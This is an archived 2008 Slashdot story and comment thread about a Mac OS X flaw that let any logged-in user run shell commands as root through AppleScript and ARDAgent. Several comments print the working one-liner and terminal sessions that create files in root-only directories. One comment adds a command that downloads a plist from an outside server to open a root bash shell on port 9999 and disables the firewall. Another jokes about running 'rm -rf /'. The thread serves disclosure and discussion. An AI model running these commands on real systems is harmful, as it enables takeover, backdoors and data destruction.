Stories
Slash Boxes
Comments
Search

News for nerds, stuff that matters

Slashdot Log In

Log In

Create Account  |  Retrieve Password

Mac OS X Root Escalation Through AppleScript

Posted by timothy on Wed Jun 18, 2008 04:39 PM
from the oh-snap-crispy-apples dept.
Security Bug Businesses OS X Operating Systems Apple
An anonymous reader writes "Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn't switched to via fast user switching. Secure? I think not." On the other hand, since this exploit seems to require physical access to the machine to be rooted, you might have some other security concerns to deal with at that point, like keeping the intruder from raiding your fridge on his way out.
+ -
story

Related Stories

Firehose:Mac OS X root escalation through AppleScript by Anonymous Coward
[+] How to Save Mac OS X From Malware 222 comments
eXchange writes "Well-known hacker Dino Dai Zovi has written an article at ZDNet discussing last week's discovery of a critical threat to Mac OS X, and another announcement of a Trojan horse exploiting this discovery. He suggests that Snow Leopard, or Mac OS X 10.6, should integrate more robust means of preventing malware attacks. Some of the suggestions he has include mandatory code-signing for kernel extensions (so only certified kernel extensions can run), sandbox policies for Safari, Mail, and third-party applications (so these applications cannot do anything to the system), and some lower-level changes, such as hardware-enforced Non-eXecutable memory and address space layout randomization."
[+] Two Trojans For Mac OS X 326 comments
I Don't Believe in Imaginary Property writes "F-Secure is reporting that there are two new Mac OS X trojans. The first is just a proof-of-concept from the MacShadows people that takes advantage of the unpatched ARDAgent vulnerability to get root access when run by the user. The second relies on social engineering: it's a poker game that requests the user's password, claiming to have detected a 'corrupt preference file.' It then takes control of the computer. Now that the source of the proof-of-concept is publicly available, we can expect that future trojans won't just politely request your password."
This discussion has been archived. No new comments can be posted.
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.

Mac OS X Root Escalation Through AppleScript 25 Comments More /

 Full
 Abbreviated
 Hidden
More
Loading... please wait.

  • ARDAgent is Apple Remote Desktop (Score:5, Informative)

    by dch24 (904899) on Wednesday June 18 2008, @04:44PM (#23844951) Journal
    ARD = Apple Remote Desktop You can remove it by following these instructions [macosxhints.com].

  • Physical access? Have you heard of malware? (Score:5, Insightful)

    by jeffmeden (135043) on Wednesday June 18 2008, @04:48PM (#23845037) Homepage Journal

    On the other hand, since this exploit seems to require physical access to the machine to be rooted, you might have some other security concerns to deal with at that point, like keeping the intruder from raiding your fridge on his way out.
    Malware arguably (one of the greatest scourges of modern computing) spreads by just that, local root vulnerabilities (also known as 'standard procedure' in the Windows community). What makes this exploit so useless, given that all the perpetrator has to do is send it out to enough people hoping just a few will run it?

    It seems perfectly serious since one of the main security aspects of OS X is that root access is held sacred (as it should be) and malware is assumed to be 'stopped at the gate' by that policy.
    • First, yes, this is a serious bug. It's a classic blunder, like getting into a land war in Asia, and is similar to the in NT3.51's scheduler to get LOCALSYSTEM rights, or the one in /bin/write in 2BSD to get a root shell.

      It's also easy to fix.

      And I am about 99 44/100 percent sure that there's more undiscovered holes like this in OS X, Windows Vista, and any random Linux desktop you could name.

      THe thing is, it's not true that "one of the main security aspects of OS X is that root access is held sacred (as it should be) and malware is assumed to be 'stopped at the gate' by that policy". It's not. You can protect the OS from the malware, but the malware can still hide, still restart itself after a reboot, and still destroy everything you actually CARE about without root access. And malware can similarly break out of Vista's jail around IE, and whatever APple does along those lines.

      Security is like sex. Once you're penetrated you're ****ed.

      The biggest advantage that Apple has is that Safari doesn't (any more) have a mechanism (at least not by default) to blithely execute outside a *closed* sandbox (not a leaky one) any random malware that can convince it that it's safe and trusted. That's the biggest security problem Windows has. ActiveX and all its kin. It's harder to penetrate OS X in the first place... you pretty much have to depend on social engineering... and people CAN learn not to be social-engineered.

  • It's the same marketing mistake as Microsoft. (Score:5, Insightful)

    by pandrijeczko (588093) on Wednesday June 18 2008, @04:53PM (#23845113)
    Yes, I fully accept that an exploit requiring physical access to a machine is a much lower security risk than one that can be carried out from a remote location.

    But Apple have made exactly the same marketing mistakes that Microsoft did in selling their respective OSes as ones that can be used easily by people with no knowledge of computers - people still click on attachments they shouldn't, still give their passwords to phishing web sites and still don't install regular security updates and scan their PCs for virii.

    And in the case of this specific exploit, I am sure that a number of newbie Apple users would happily tap in "osascript -e 'tell app "ARDAgent" to do shell script "whoami"'" into their computers purely because "Jim The Friendly Computer Support Engineer" told them to do it.

    So let's not beat about the bush - ANY exploit that isn't fixed as quickly as possible is a problem because there's always at least one spotty teenager trying to become a HAX0R who is prepared to try his luck against some poor unwitting user.

  • Proof of Concept Possibilities (Score:5, Insightful)

    by AgentOJ (320270) on Wednesday June 18 2008, @05:44PM (#23845947)
    This code could easily be wrapped into the preflight scripts for an Installer package in OS X, or integrated into any piece of malware to escalate itself to root without any user interaction beyond downloading it and launching it. In this sense, the arguments against the DNSChanger Trojan Horse of "it requires an admin password to be installed" becomes null and void. This is fairly serious, folks. One-click privilege escalation is way too easy for script-kiddies and professional malware distributers alike to integrate into their nasty programs.

  • Intellectual Honesty (Score:5, Interesting)

    by JeffSpudrinski (1310127) on Wednesday June 18 2008, @06:41PM (#23846729)
    Firstly, I want to say I'm impressed.

    I'm not a Windows Fanatic or a MacEvangelist. I use both Windows and OSX and they both have strengths and weaknesses.

    I've seen waaay too many posts here and abroad about vulnerabilities in every OS out there. They are an unfortunate fact of life the IT Universe. However, too many times, when info is posted about Windows vulnerabilities MacEvangelists scream about how secure OSX is and and how Windows stinks. Conversely, when a vulnerability for OSX is posted, many of the same users write it off as a non-issue, too hard to execute, or some problem with the user's configs rather than an actual vulnerability.
    I have seen more than the normal number of folks, however, responding to this article with honesty about this exploit and even testing it further. (Let's just hope the underpaid Apple engineers [see other article about that] are listening).

    There are those here, though, who seem intent on writing this off as a non-exploit or trying to explain it away. That's where a concept known as "Intellectual Honesty" comes into play. You have to be honest with yourself about what you know and do. Viruses are a fact of life on computers and, while Apple is closed architecture (which by its very nature makes it MUCH more secure than other OSes), it's only a matter of time before real viruses appear for the Apple platform that just won't be able to be explained away.

    This article's exploit is a dangerous one to be sure and there are several equivalent Windows bugs. However, for all it's faults, Microsquash does a reasonable job of patching vulnerabilities carefully. Sometimes patching them right takes a little more time than users like, but the patches usually address the problems (although they do sometimes introduce more).

    Apple does an "okay" job of patching vulnerabilities, once they admit that they exist.

    There's another article about "carpet bombing" attacks via Safari and IE in Windows, and the responders there are perfect examples of the problems I refer to. A goodly number of them seem to be intent that the problem is Windows' fault and not a problem in Safari. Windows has issues, but the security problems exist in the program that's running and it's the programmer's duty to make sure that the APIs and such are called correctly and not in a manner to allow exploit to occure (too many programmers take easy shortcuts that introduce vulnerabilities).

    I hate to think it, but I will probably get the ever lovin' crap flamed out of me for saying all of this.

    Let me re-iterate. I'm impressed by a lot of the responders here with the unusually high level of Intellectual Honesty from Mac users than I have seen in the past. Let's hope the trend continues.

    p.s. I love the "security is like sex" comment above. Well put.

  • Physical Access Excuse? (Score:5, Insightful)

    by TheNetAvenger (624455) on Wednesday June 18 2008, @08:39PM (#23848203)
    On the other hand, since this exploit seems to require physical access to the machine to be rooted, you might have some other security concerns to deal with at that point, like keeping the intruder from raiding your fridge on his way out.

    What about non personal deployments?

    Like corporate installations?
    Kiosk installations?
    Any small business that wants to secure a machine?
    How about a class room that you want kiddies to run games but not wipe the OS?

    Physical access MEANS if they can access the hardware (inside the case). It DOES NOT mean typing something on the freaking keyboard, when logged in as a low level user.

    In the IT world you password lock boot media, lock cases,etc. If an IT person can't secure a machine without removing the keyboard, there MIGHT be a security problem.

    (SlashDot Editors? WTF?)

    • Re:ARDagent (Score:5, Informative)

      by Medieval_Gnome (250212) <.gro.emonglaveidem. .ta. .ongdem.> on Wednesday June 18 2008, @04:52PM (#23845095) Homepage
      I might be misinterpreting you, so I apologize if I am. However, it sounds like you're saying that in order to have this code work, "Screen Sharing" needs to be enabled in the Sharing preferences. This is not true.

      Even as a normal user on my mac, the exploit code works.

    • MOD PARENT DOWN (Score:5, Informative)

      by Moridineas (213502) on Wednesday June 18 2008, @04:56PM (#23845189) Journal
      Other reply -- Medieval_Gnome -- is absolutely correct. Unless you've DELETED by hand the Apple Remote Desktop files, the exploit works. I do not have ARD enabled, and the exploit works.

    • Re:ARDagent (Score:5, Interesting)

      by Sentry21 (8183) on Wednesday June 18 2008, @06:50PM (#23846855) Journal
      Disconfirmed - I don't have (and never have had) Screen Sharing enabled on Leopard 10.5.3, and this exploit works perfectly.

      dan@Geelong:~$ ls -lh /etc/somefile
      ls: /etc/somefile: No such file or directory
      dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "touch /etc/somefile"'
      dan@Geelong:~$ ls -lh /etc/somefile
      -rw-rw-rw- 1 root wheel 0B Jun 18 14:16 /etc/somefile
      dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "rm /etc/somefile"'
      dan@Geelong:~$ ls -lh /etc/somefile
      ls: /etc/somefile: No such file or directory
      So, how dangerous is this? Here's an example:

      osascript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist [cdslash.net] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl "'

      This will download, install, load, and start a plist that provides an interactive bash shell on port 9999, and disables the ipfw firewall (Which is not enabled by default). If you run the above, you can 'nc localhost 9999' and find yourself at a root shell.

      To remove, run 'launchctl unload com.apple.bash' 'launchctl unload /System/Library/LaunchDaemons/bash.plist' and then 'rm /System/Library/LaunchDaemons/bash.plist'

      It should be noted that this service is accessible even if the application firewall is enabled. The only thing protecting the user at this point is their router firewall, if they have one, and that's easily bypassed with a Python script.

      So yeah; anything can be downloaded, and anything can be done with it. Scary.

    • Many people have sshd running as well, so it doesn't quite have to be local. Just need a shell.


      Verified, on my Leopard box. SSH'ed to it and rooted it (I was able to touch a file in a root-only directory)

      Nope. You cannot do it via SSH unless that account is already logged in physically, at the console.

      [pudge@bourque ~]$ ls -l /etc/test1
      ls: /etc/test1: No such file or directory
      [pudge@bourque ~]$ touch /etc/test1
      touch: /etc/test1: Permission denied
      [pudge@bourque ~]$ osascript -e 'tell app "ARDAgent" to do shell script "touch /etc/test1"'
      [pudge@bourque ~]$ ls -l /etc/test1
      -rw-rw-rw- 1 root wheel 0 Jun 18 11:27 /etc/test1
      versus:

      [pudge@bourque ~]$ ssh maintenance@localhost
      bourque:~ maintenance$ ls -l /etc/test2
      ls: /etc/test2: No such file or directory
      bourque:~ maintenance$ touch /etc/test2
      touch: /etc/test2: Permission denied
      bourque:~ maintenance$ osascript -e 'tell app "ARDAgent" to do shell script "touch /etc/test2"'
      _RegisterApplication(), FAILED TO establish the default connection to the WindowServer, _CGSDefaultConnection() is NULL.

    • Re:Can we get some sources? (Score:5, Funny)

      by Anonymous Coward on Wednesday June 18 2008, @05:00PM (#23845263)
      who needs a source, it works. tried on my mac, output is: root

      so i tried replacing "whoami" with "rm -rf /" and

      !@#ca$a%H&(
      +++NO CARRIER

      • Re:Physical access? (Score:5, Interesting)

        by MyDixieWrecked (548719) on Wednesday June 18 2008, @05:12PM (#23845465) Homepage Journal
        Actually... interesting.

        I wasn't switched to via fastuserswitching, but I do lock my screen. that seems to have an impact on it, too.

        I ssh'd into my box at home and running this was successful.

        fwiw, osascript doesn't work if the user isn't logged into aqua. I've tried writing volume controller scripts and I tried scripting Unison and other applications and they don't work if you're not logged in physically at the machine.

        So basically, an exploit would need to be fired by the user or by something the user did (ie: surf to a website).

        This is interesting.

    • Re:not a full exploit, yet (Score:5, Informative)

      by rritterson (588983) on Wednesday June 18 2008, @05:12PM (#23845469)
      Actually, the above only occurs as I had 'su'ed to another user, then ran the above command. If, instead of using su I simply try to touch a file in the second account, it works just fine. So I retract the above.

All trademarks and copyrights on this page are owned by their respective owners. Comments are owned by the Poster. The Rest © 1997-2009 Geeknet, Inc.